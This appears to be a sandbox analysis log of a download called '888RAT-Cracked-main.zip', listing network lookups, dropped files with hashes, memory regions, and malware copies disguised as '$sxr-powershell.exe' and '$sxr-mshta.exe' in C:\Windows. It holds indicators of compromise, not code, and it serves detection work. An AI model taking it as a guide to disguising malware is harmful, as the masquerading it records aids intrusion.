GB 216.58.204.67:443 beacons.gvt2.com udp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 camo.githubusercontent.com udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.202:443 content-autofill.googleapis.com udp
NL 142.250.179.202:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 80.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 146.25.221.88.in-addr.arpa udp

Files

\??\pipe\crashpad_3748_MYLSDGBBMUGRKWFH

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 fc8a00d6288998372c19bedf006d46a5
SHA1 12d053136f0e2205a7fbb85a2ca190a3cecbc3ce
SHA256 57ebada55f91d2a06c08592c0f3c746cf240ca03f64e7b070a6e1ef50a565877
SHA512 396cd5a5f7b418bc0292ab28038aa104601a01aa9b0829e9137600933f27553dbf2c874f0481262bdb142a14b146e744c5e1ac45a4ce9caa0596c3f8131279d6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b803344b1a74e1ed229af0f3a0e73a18
SHA1 e7d3bc799c017c2f15df7334f6d7d35977ebadea
SHA256 aa0801ef3189290e63f0d31fac670da0f2623dd3480236cd214c95a41ecf4960
SHA512 ec076f77182a6a4b487f5ee57a656add1a5f0498823a790096e9d193e1c04ed84e44dd6018cb0210a696359cd91813d0562aa88efb22daaee59a017c5e0542af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 6630b028622275bb51147b11b27118dd
SHA1 40a121b645e8b73b7bd6b58f5dbc214b2d5f2d9e
SHA256 1ea5d5f397c5e87e8319537a0090553c4c3c025dc3d9cb3cd33b6450ebfd8e20
SHA512 28e2b13e645fa4e677507bac11842f2f4b314c6814e457fbaef686016927b707dde761a760afa581233b4c0d0af469d5aade7b23a877f4096035305686502bf4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 514f5f5e7203a40596d937fc2cd5ee76
SHA1 7bda61060b2fbecebe281ca4209a5f45a21fdd6e
SHA256 d8c62b246a806d517ae1ab722b11cc2ba2677c4278c75154a54e2a3dbfc1b1cf
SHA512 b185a25243841e8032ccf08509f31af7464c0257f538cce7ed963c3c341bf79fda7adc6006deb01844a00644c40694eb401316d672e889ddd51bcaf9385e2382

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f1a792564a9d9c763f03b22093845386
SHA1 95616f5c516e56ae3b6988fa71ac46c8e3bd05a0
SHA256 a966794caaf953ffb2f3638b41a11dbf1d5113aeac7f0cee2ffb4d9c79c6da22
SHA512 9ee194953713b52948f0a32d8c4c6ccdacb9b90ce4b8a0c636522ec736377b29d95ee3b307096fea6d1eb303daf59d5306e59095a6484aa6ea2600c2af2f4368

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

MD5 3eb563ce8caf946ae2b552408aed857a
SHA1 9783bfb1195e1b3aaf168e577c25c604bbce1fd3
SHA256 817de74b5ac792b0f2b9db31930e47a98c7cff6d8a08d30ad25f29d208853ab6
SHA512 db225ddfabe8d1f63892d661426d3e89291433349652fb4352557b4e7df042b4c9d48715864b595734396aaa46a8ade1fab7cca115ef131c556941226a7f5ad4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

MD5 a32157100d3191d8dd78cb860126e930
SHA1 8ec54e2681838e2ae66052f40710cf60c1cf9486
SHA256 f9b366d4b7c4cd1eb858aa31d353594cf5bbc8ce49b87fb9ea3bf61b285f64eb
SHA512 fb0d89eb751817b5c3238306545aadda0e0b15d75b221bbb26d99db4a518553b91a181cc01d11d8a1ae097b83977c748df7f6f2edc8557d94cdf3bed16fc4e23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

MD5 35accd3ea6bf5a8ed2df76dc384468c7
SHA1 3d9c7dd7c274bd4f5f9a198306d605ec249dd900
SHA256 82a9da65079a9d25e91202e0e19b1b416ff18498685b371dfefbdd928a21ecfe
SHA512 af7e9bfa3977bd0251e56f58ce87850e4da7dacae149f6385c9d9b9b363f9dd3b38c90c77e57b2e3cb25a003afd521f83e6f018baa6bedff1f9cb0d85b2d97b5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000018

MD5 76b10e9413e4e345b85cec780fe1da6f
SHA1 89c7451119135f2c34a428c707bec8a028d8d0e9
SHA256 72bb862470e3ef3fb30093387028fe944f1393d29dc4dde77774a4af7fe8bb97
SHA512 5da3cb0505107acc4e6dd372a3489cb6206ef7fa1adcdab7057362a5cffc70c01db496a7f8df8336e5f51d5d883cee80596071895f49148cddcb747b510d8f3d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 5679f4642d620448cb0269f3163d1f4e
SHA1 5765b135d84f3ec90abedaee21b90214b899ea83
SHA256 d3b05d889277c3291494ce42560bc92c3de1728b6b4758d7f1d24252c64da0e9
SHA512 c6d5ef04c614234f8f57de3a2700db0635ad422c6d76b0e2a03852fe73be7b8770c3773abb15393be6a80b46f04aa397e36ef6b4d61fb67e331813a376123bad

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\790db9ad-f047-4ef5-9023-e75edf5abccb.tmp

MD5 6b7c000f39a6e70c02bffb29b92d20c8
SHA1 7afbefc9cde2a42d156f5774045a9b466923d120
SHA256 60ffa5d15f3907729006058e73d04ab71b5855090c63ab71da375df34e3c057b
SHA512 9d466b6ed523c18e01a0456416a34fb173f9966f47e0d629b43b4e585dc5ada252165fe7a8e064a8339d329cb5a2ae279135b5e079c4ec157ff1c3e9bc1dc807

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 7b7376467c7b82011e81fd26ce00ee60
SHA1 159313d3f8c4876e1512d34c9965024846c751b3
SHA256 35dad6dd8a12283fb2abc73850b6b16e7a6af40c30f5898e2c2df3c370a2514e
SHA512 aeb40ff01e344cd6fb46832f16a020e457344383598bac3d369dc327d2811dc7c26cfc46d6e40deb7f4e9c4a59c8c80c43b40db131a6b8e7da2c50b807e7acae

C:\Users\Admin\Downloads\Cracked-Minecraft-Hacks-main.zip

MD5 a0bd301f45f0f082edef834444e16caf
SHA1 52147fc295ffb073dc316a46b72a2cad1e555291
SHA256 a2c69f5f8e5613eeec7346b7cbb3f2f4971b13dd0ecd1acd504a550b3a54929c
SHA512 88c2c09758e337a46caa0f86eb0760f58300b678b9bcb4d828689bb657f4120b9728eb636deefe1805310a1047e8098bac7d7505877f68e3996fba5c25bfba90

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3169303ff4838040a827116563c4d261
SHA1 90b87498ad2b8606122af1923f418bac187ffc8c
SHA256 e6a8f043cf56313d7adfc0653f7e073744cac8b9aac370675d4f852ca9254136
SHA512 efed499e65a3f89622c4ba47d849fafb8678c2a03271cff950680203afb8ba14f61e304eed10bad31a06210a244d852481f65157626eb772be3c7b991c3426a7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 6e2f6c7381081fd84980e6f1311419a2
SHA1 fbd0d0cd288c43a955857f28277f2480e11a8ac3
SHA256 ab9036b570799b357cc5d6c4662f64848f502b036646ab4e94d0c00c985819e1
SHA512 ed326a5844de58801522919f4c391bb965fb11da111f9eae84de76bcc8b877df7f6dad6d6886882c880fd1194ce40d27f5867aed850605d8e0ff6510322d5e99

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 14d9171bf3c1ea0add316fa92cd82b84
SHA1 bd371714a68931b061357d467b5f186d536e3af5
SHA256 24ba5471d544e72a1f54983ef6723f46e66f6fd7aa571b17f0ea4f0c2393eff2
SHA512 c8923888ad81457fb49163bb62f57fff2192a418d97fb2ab18be55a59a3a3e0e406edbfef49fa2ba1d5fe4ec7ad4afffa5baa2a5dcf4b557d6f9c586e486f3bd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe586695.TMP

MD5 df4dccbcfc81c054831d8c19944223a8
SHA1 9d8d8e80767785e778f6215a8c9732ae54747659
SHA256 d6929002ef5e15eabc83c5cf6c3ef637035ae4724227e71eb3584f129a5091a2
SHA512 cb50f60e53fba3c38bf958022bbf9e8fe73f15f4ffbbf587de106f43d05393724da58c1504f010bf37f6b24fa6cddfcfaf21523eb079c9a64c077e4415bcf2ff

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 0ac3148b7088c1c871b20adca7f965e4
SHA1 99ef3022000002bcc83e609a19ebe6412e6a7a87
SHA256 28daba66fc54a83d6b115a87a261d75ec4ed4c90b44aef69cc67aa341b5d9311
SHA512 c3884ad9b0ebfa15ceaeb04e5773f8848864ff4f378f0457f49a4640eea9c17e67fae282e53e142dcf74824d770afd857a0671ee28505cce6cebf07820e4f049

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0a70a93497387cdc9375a999a2ad6c04
SHA1 dbc8bb2af7c1fbafd92f6f730cbc3fba8de9eace
SHA256 e173d1242e3b71cc90705b2b589e84ed8ef51841755c7c339f256312e8a2a080
SHA512 056273a06ee9e997026dd67af211429518e63bfbef2f882a9ac0205a778e45035f785655a9e1a58e456ff46d59b8e18649d30c48199d423ea9841c1ea6033916

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 0376b6e7da12a810467b4b489d554c8a
SHA1 18be41a093345bbb34b0c46623c937b3db94401e
SHA256 03d832c7772eb49bdf0d5e02b405d62bbdb109b6b5a3bccdddc0d043de742b3b
SHA512 01c255131cbb40de986338bd0237fe82f8e4b3f0e1b4c8a9842b50041f3cbf4cd6ece84e37d42a2cca4b3278eff97cc396500f142c474ebea6c0d3d8a3da005b

memory/4880-504-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-526-0x0000000000B30000-0x0000000000B31000-memory.dmp

\Users\Admin\AppData\Local\Temp\flatlaf.temp\flatlaf-windows-x86_64-5706203418750.dll

MD5 4ca3290a99adadde557930cd481d7539
SHA1 26034442a76131dd3d37c8f28b6e9bebc7c1fe7c
SHA256 dd130c68dc36bcedbe51a6b8ec3b3358a460d45952f6280e12331f48850b6b3b
SHA512 9341c60f92dd3f89f82555055924bdae6fcce1e4cd13a7dde5129ebdce04bae377292237a2ed6c3e7623b242e82b01c7ed1717af4d7db8ca473e9fd7b7b190d5

memory/4880-541-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-545-0x0000000000B30000-0x0000000000B31000-memory.dmp

memory/4880-551-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-553-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-554-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-555-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-556-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-559-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-560-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-561-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-562-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-563-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-564-0x0000000002B70000-0x0000000003B70000-memory.dmp

memory/4880-565-0x0000000002B70000-0x0000000003B70000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 165334a817f525a0e8502afbf4bbcdca
SHA1 5038c688a4b0818b8dfee67b7c7ae649ad559925
SHA256 d5bfe0aa5182cbfc8ea21c77063015fff90f092e3dfd93a73c24de9fd95b0290
SHA512 3d50f1041a5bb4ec7148e5a3a2d88ae069a8171b3e396fbcf1acfb0c506199aa47ac2e9302fec2b34df78fa67695a42715ac9c7538ce8619c686d4c9f3a1df1c

memory/4476-599-0x0000000003190000-0x0000000004190000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 846c99fa0cf0fac782087951bf9377fd
SHA1 924999726ab5616df45422830123fca1a4566707
SHA256 3de361a4cb7ffd053fc3a5ae40f52efabc0f9509791ea9c23d0fcdbb2e9bf661
SHA512 f3d77a4a4ce2041c701253ca53af01a75ba27b477096cf5c42b86175328ba9053c1f2c098075737cfd72363580f1b23f7af065027985d5b9f11862eb5f80018a

C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

MD5 ef7a495d23bc1f065c81af33c3dc0fff
SHA1 61d42b6937054990d8f35ed7c11a300f7f2a9f85
SHA256 130c57869a9714ed4ba5b2d6e1c87d94af72242835c2e311eaddebed36fb51b7
SHA512 bfcc9e8176168129d3c92bcb9d94fe12421589df858d94989f18dc69af05e27b19dc4caf4e5f6b579f628c1b5d31cfbae4369f5424f7af0650f38cc1dcd268bc

memory/4476-603-0x0000000002F20000-0x0000000002F21000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 a76d9424995a6f6de177c576270e937c
SHA1 954a1ebdbdf7f56bea5e2c07a44c4f11aea45365
SHA256 16975f9559e392759ccda8e0a159586bbc96d37ba0e6a26cea1118529de2c540
SHA512 754253fe05710b8fab035ab633035060967f950abd7723eb84c51d756669010baee9ff34ab50150a235f7f3d0348e1142a86a7b26c8666be611d43542047b3e1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 5c1a6de3f16146db417e2c18cb2149e7
SHA1 55c2200c443254fc2c306d15447b630dc6ccddfe
SHA256 e2cc2797c76173633f4e1170b7bd27858662210f64a98b472e61245ede0b8312
SHA512 578fa1f6dfac9ab266e4f78a3bd94f64eb836305544da6050b67ac6483b8d76a515d50133de03a0ec7a34cb2a1bea47c6c5ac853cf150f6ee3748d54ec8135e6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000011

MD5 87c509f0a8b4a4b38bfe5100dbff03de
SHA1 587cc460cac254f3b87d3699c77233db3cb6e802
SHA256 d788daacff52b350c008343d7eccb0c3a31c4f5cde386c53213cb2145c55816e
SHA512 ab3727d31e0c9f0cde9f5074869dd0d585d5280db2cd1fb9aa182f09a9fdd5d95c70b5449a929e528d4d7dd0f5ecd29d26d122b013cbf394c8f2bea788ecc77b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000012

MD5 5d9b7eb68768481a0989ded4eef2fa49
SHA1 e0371a48813b1f842a5ace827793df3f916cd012
SHA256 bb568d46fcfc0636f69ebc72f5faa6034f896a668f1bf5c10be2e21bb93cbd0e
SHA512 9c22a5ab50c6ff354031af843a6d7ea184d84367cba3b0422420099764cf6b2904dfa775522aa3d86808ac9d52b47d8c13d2cd4cc9cc4d96e69167b63ba184a4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000015

MD5 8a2e850685b8a72f1207f7e3c9fa6ece
SHA1 324c7149888313cfce0d243a553894f0cc207d86
SHA256 9bbbdbcd226cd61951c1c96a4f51159d8009cd08f16670328f07d9f5ee93968e
SHA512 0feb2621428e5cdafcfbc626a01f4deb080189734c4022e572412b5290544d517958c62935902bf366c6f59cab9dc16b88122b1cb81ecc602567d15132e0b982

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c8dec70671822f846f9953c2ec4d4b59
SHA1 1c3aeadaa17005fc756089ddf7d966136cc9cec9
SHA256 41939919b511a418aa30547c4bd0f4c286fa9c166459326834e1f6d1670c38af
SHA512 82f9c157a4764045930e1d21f8d7efd917dfddb75333544c39b64ddbd71c3762f2d66f6896950a68523bb422b5fe1b9226561f732284d7ef6bc958651059f4c4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 6ea2337dff31f27a7bbf7da7d205a36f
SHA1 2ac71cf8dc9c43337b4288b33164ccd35982ae52
SHA256 ca2ecb3cc2d7a8c96eda877a2f3c61cfd22aebeb75e99d9a61057bdad762c0ca
SHA512 4180e88141fa79bb81bcc66a1e987118c6f1360c4b62f145e8c1f0f1f66dea1ee09f761713457b164ca135f0d25bc1153ebd6b2a188d1ae6bf10c555f41a8876

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 a56c75327c3b1bbcb12026ab8a55f0bf
SHA1 816cf6d42eac677b5a48581a3e0ad9b146ad276d
SHA256 07a2c6b443c13d2b95e5ffef896d8442e5cff8a482cb211540955b43f2154706
SHA512 b4a0cdc32aa6426e005cc507d0fc0ac511f0c9330ba356b2b48b6c4b3fae6f45732aa156597f609595b320f4401e432ff7a4bbad096e3243589b45e1008a9f8d

C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

MD5 5fb94a1356c883bae54b8b1eb71248fd
SHA1 f65c41719b36c415b0497bcf3ff37558c5ce2c78
SHA256 099d04b164e7ae40a435eb0608269a21784f40f570bbdceaf958ab0664546952
SHA512 ca2b84995d036ed7866527921a192302b2662899db86873f7f054786d5717545c18bedd40af7910f5ea130c876b54a220738ab428b69e9561857d8699038eaf8

memory/4268-767-0x0000000000C50000-0x0000000000C51000-memory.dmp

memory/4268-755-0x0000000002B20000-0x0000000003B20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4183903823\810424605.pri

MD5 a2942665b12ed000cd2ac95adef8e0cc
SHA1 ac194f8d30f659131d1c73af8d44e81eccab7fde
SHA256 bdc5de6c42c523a333c26160d212c62385b03f5ebdae5aa8c5d025ff3f8aa374
SHA512 4e5ba962ba97656974c390b45302d60f4c82d604feb6199d44e80497a40d0b0a9fd119ca17ac184809ca0821ab6813292892c433ed7277f65c275f37a96070b9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\1601268389\3877292338.pri

MD5 0d02b03a068d671348931cc20c048422
SHA1 67b6deacf1303acfcbab0b158157fdc03a02c8d5
SHA256 44f4263d65889ea8f0db3c6e31a956a4664e9200aba2612c9be7016feeb323c0
SHA512 805e7b4fafed39dec5ecc2ede0c65b6e103e6757e0bd43ecdce7c00932f59e3e7a68d2ea0818244dfeb691b022c1ccca590a3f4239f99e1cd8a29ba66daed358

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 927e26e63f1884952289bbe0fa2e86d9
SHA1 806d31eb2495014cdc567f93a2a25493215bb513
SHA256 2d80af4f154c8a400c1c84605cca325f63a3ee6f442732631dd4f8070b6ecba2
SHA512 ea4872ef502e4a5d74840507d5d618b62fbe9724f93878f6ae5c22177631d02ec9365a51ccda9953a858188ae48c2874a32b7b2517171cb9c389824ea3a5e929

C:\Users\Admin\Downloads\888RAT-Cracked-main.zip.crdownload

MD5 956eb9694820221c1ba0e4ac2f7eaac8
SHA1 e030f490d294d1acf763323bd891e3de55c5ac88
SHA256 1be9c88bfcad9983f090f20a77d6bd8d7b331588d04122abef6c0d2bacb4690e
SHA512 440287aed5c72ac5037ff778fca2ed43b5b4a98d08ff490321935ee2bd0043c90c269d3cdc6630e81d0850994d9e001fd6a7702fcc6f870c38274c6abbcc29da

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 05bd5007198235fe02036db56084a821
SHA1 773acec51df40fc2de00e8dfa0defba975489e59
SHA256 a6f1a348b01292c32088d0f652e72758f30833910a6337ffaa0f4802abd6e91c
SHA512 2bf994a85788c4dc062977bffc081e8a85ce4d075cf5f8845f000ad7e5ddf18b8fee9e50d0ed605f8680fa6dd85f8649e7c57e776e896964a656c838815a6a77

memory/4268-799-0x0000000002B20000-0x0000000003B20000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 bd3b35a383ffe48b4ea8f97c4bc440f1
SHA1 506993096850ad54a543699fff82973ba3e9894c
SHA256 3f57f2f8d92934534ee2e7cb226c49431f22b9e5d06f42e623aef0adce764a12
SHA512 7c8a45b1b85d1e157c900758724ac42bbdf18e70f65cb2a0bfe1f8b66ced271745aaf515d39556b70f114045bc613006e0e43bfb2ff38f7a4183ae6f0f1af8ae

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d76bff1790cdf1b3a1b6f65adfa9366b
SHA1 44b64b890317c14a5751b57194546d1610e13941
SHA256 1824d48adde6245e70295569dccc5250d8793ee883faf19c480c725f49d21952
SHA512 791a6de28141d1895dcdf57b6231f3f9c984016e0427f0a65da42cf56a72dfc4b3472a8068ba0337e903dc3d65aadaf09787e2896bdf8c86cb5804a1d1dffa9a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f8681b771cf9b5ceb42b03d2e7f73226
SHA1 23f0263abac60d9ae5e77200163bd2595aeb7eeb
SHA256 816eb2951ef5a84ed6f23a03b08db71919bc73cbb262df48163643931a1f4ece
SHA512 33b952fa9a59c6603aba2d3308ebcde5fff675f386f550d1c8b382ef60f83da35134c0f70358f18ce72916f75f60a9675c6a6fb2d80a618c1a55f4b78c5cf2c9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 422eaf3fc21b661acb6de1217d722f7f
SHA1 2d01a55a8d3ebeaadc9e91346951a050247462cf
SHA256 00f753c83f67e0704344987c17d6773e2036b1c82e3f4e4c14cace6e4816a62d
SHA512 181ae9ff3e150faa3fddf7b5152e266690a15c70ba5d93ff262d53881b9cbf7c2017bd937cdf255607eccbe79b93397a4cd6008bf2f84f3ac49689b1eece3050

C:\Users\Admin\Desktop\888RAT\888rat-install.bat

MD5 898f49c739026123b6a3811fa31abe70
SHA1 31ff6036b40d70d21cb1c4c0163cba0d4c720551
SHA256 78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f
SHA512 a9aa2bf15db84361f315156ee6386cac49c14c2449a72e2f50b2e0b8d100781019c246c03a38a37d5dfc71a7c1c5451457faba074d1a875cab615ecb8d3e453d

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4348-848-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/4348-849-0x0000017EC1D70000-0x0000017EC1D80000-memory.dmp

memory/4348-850-0x0000017EC1D70000-0x0000017EC1D80000-memory.dmp

memory/4348-852-0x0000017EC1E20000-0x0000017EC1E42000-memory.dmp

memory/4348-857-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\888rat-install.bat.exe.log

MD5 709e7fe83527fb79398bc5e8205531d0
SHA1 2c74b6f0374ce41788a84a20d35c3e46ade23703
SHA256 bc1413ec4bd4b64d7816320ae15c6bf3d1b5029edb062cbd2d5be477a98c92dc
SHA512 37083c6a57f4cc2511ed1595df403845d4d60dc2cb9f09b0603216f441f3059f1423769c0c5d02f7251d1a50fa641bf4dfae8a419b35a4825cf329e6a7f540fa

memory/3632-863-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/3632-864-0x0000021F7D7A0000-0x0000021F7D7B0000-memory.dmp

memory/3632-866-0x0000021F7D7A0000-0x0000021F7D7B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qkijn2md.lsr.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3632-893-0x0000021F7D7F0000-0x0000021F7D82C000-memory.dmp

memory/3632-904-0x0000021F7DE70000-0x0000021F7DEE6000-memory.dmp

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4264-913-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/4264-916-0x0000012AB6070000-0x0000012AB6080000-memory.dmp

memory/4264-917-0x0000012AB6070000-0x0000012AB6080000-memory.dmp

memory/3632-932-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/4264-933-0x0000012AB6070000-0x0000012AB6080000-memory.dmp

memory/3632-934-0x0000021F7D7A0000-0x0000021F7D7B0000-memory.dmp

memory/3632-939-0x0000021F7D7A0000-0x0000021F7D7B0000-memory.dmp

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4264-941-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/4264-942-0x0000012AB6070000-0x0000012AB6080000-memory.dmp

memory/4264-943-0x0000012AB6070000-0x0000012AB6080000-memory.dmp

memory/4264-944-0x0000012AB5E50000-0x0000012AB5E74000-memory.dmp

memory/4264-947-0x0000012AB6070000-0x0000012AB6080000-memory.dmp

memory/4264-948-0x00007FF969EA0000-0x00007FF96A07B000-memory.dmp

memory/4264-950-0x00007FF9674A0000-0x00007FF96754E000-memory.dmp

memory/4264-952-0x0000012ACEA40000-0x0000012ACF490000-memory.dmp

memory/4264-953-0x00007FF969EA0000-0x00007FF96A07B000-memory.dmp

memory/4264-954-0x0000012ACE530000-0x0000012ACE5D6000-memory.dmp

memory/4264-969-0x0000012ACE5E0000-0x0000012ACE636000-memory.dmp

memory/4264-970-0x0000012ACF490000-0x0000012ACF4E8000-memory.dmp

memory/4264-971-0x0000012AB5E70000-0x0000012AB5E92000-memory.dmp

memory/4264-975-0x00007FF969EA0000-0x00007FF96A07B000-memory.dmp

memory/4264-983-0x0000012AB5E90000-0x0000012AB5E9A000-memory.dmp

memory/5024-984-0x0000000140000000-0x0000000140004000-memory.dmp

memory/5024-987-0x0000000140000000-0x0000000140004000-memory.dmp

memory/4392-988-0x0000000000400000-0x0000000000406000-memory.dmp

memory/4392-990-0x0000000000400000-0x0000000000406000-memory.dmp

memory/3632-993-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/4264-994-0x00007FF969EA0000-0x00007FF96A07B000-memory.dmp

C:\Windows\$sxr-powershell.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4264-1012-0x00007FF9674A0000-0x00007FF96754E000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 98447a7f26ee9dac6b806924d6e21c90
SHA1 a67909346a56289b7087821437efcaa51da3b083
SHA256 c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed
SHA512 c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

C:\Windows\$sxr-mshta.exe

